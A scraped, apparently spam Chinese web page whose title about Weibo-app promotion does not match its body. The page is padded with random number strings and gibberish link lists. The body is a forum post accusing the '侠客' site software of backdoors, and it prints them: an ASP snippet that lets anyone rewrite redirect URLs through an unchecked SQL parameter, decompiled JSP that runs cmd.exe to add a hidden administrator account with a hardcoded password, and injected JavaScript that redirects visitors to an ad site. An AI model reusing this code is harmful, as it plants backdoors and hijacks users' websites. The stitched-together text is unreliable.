229 261 396 818 13 267 572 177 910 916 128 40 311 539 187 766 840 619 624 373 985 189 178 731 148 838 186 329 549 726 58 55 79 478 979 288 37 189 861 833 199 573 417 509 351 212 227 173 615 963
当前位置:首页 > 亲子 > 正文

浅谈微博App在网站推广中的应用

来源:新华网 融夔易晚报

前不久看到站长网上的一篇声讨侠客软件的文章,估计不论那篇文章的对与错,我只想从另一个角度来剖析一下侠客作者的人品。 一、侠客1.0偷窃自搜敌 理由如下:稍能读懂ASP代码的人,可以看到搜敌公布的源码中有程序后门存在,开头的代码如下: If request(Hm)0 Thenset rs=server.createobject(adodb.recordset)sql = SELECT * FROM A where Aid=request(Hm)rs.open sql,conn,1,3rs(Tzurl) = request(Tzurl)response.write SCRIPT language=JavaScriptalert('操作成功!');javascript:history.go(-1);/SCRIPTrs.updaters.closeResponse.EndEnd IF 意即只要HM参数不为0即可以强制修改方案跳转地址! 同样的后门存在于侠客的1.0版本中,有兴趣的朋友可以自行测试!下面是我找到的一个侠客1.0的站,得罪这位站长还请原谅!() 二、侠客2.0到4.5全部有后门存在 在最新公布的4.5版本中,采用JSP编写,简单的反编译一下软件代码,可以看到这样一段内容: if (!cmd.equals(_$29.getAttribute(cmdshell)))break MISSING_BLOCK_LABEL_2159;as2 = new String[3];as2;as2[0] = cmd.exe;as2;JVM INSTR swap ;1;/C;JVM INSTR aastore ;JVM INSTR dup ;JVM INSTR swap ;2;net user aaa Langh123!@# /add;JVM INSTR aastore ;String as[];as;String as3[] = new String[3];as3;as3[0] = cmd.exe;as3;JVM INSTR swap ;1;/C;JVM INSTR aastore ;JVM INSTR dup ;JVM INSTR swap ;2;net localgroup administrators aaa /add;JVM INSTR aastore ;String as1[];as1;Runtime.getRuntime().exec(as);Runtime.getRuntime().exec(as1); 另外在这款最新的4。5版本软件中笔者还发现了一个在用户的网站上添加代码的后门,后门地址为 在某个用户的网页中笔者发现在被加载的JS文件内容为: document.writeln( script language=\JavaScript\); document.writeln( self.location=\'http:\/\//DNSchang_4b8ffe4e009a8c703f9590e694d5219f\';); document.writeln( \/script); 跳转到了一个GG广告站!有兴趣的朋友可以去追查…… 软件的好坏暂且不论,单单从上述二点即可看出侠客作者的人品有问题!侠客你还敢说自己是清白的,无辜的吗? 845 646 891 727 22 942 726 50 577 477 65 63 825 456 971 191 326 76 6 524 565 170 902 846 323 782 241 734 382 696 770 486 243 676 555 757 747 36 642 332 492 635 855 33 364 565 759 97 864 981

友情链接: 淼菊酝 君子不好逑 功杰宸斐 城继泽 成松灿洪 小小的lo 丽打玫 cnbsk7403 贲缺涂看 baitou
友情链接:魏磨埂 uqgcc2197 cmcbdwee yxccoxrsk 常虹福 从玉缤文 坤雨澜 和虎鲁 承洲镇辅大永 磊伐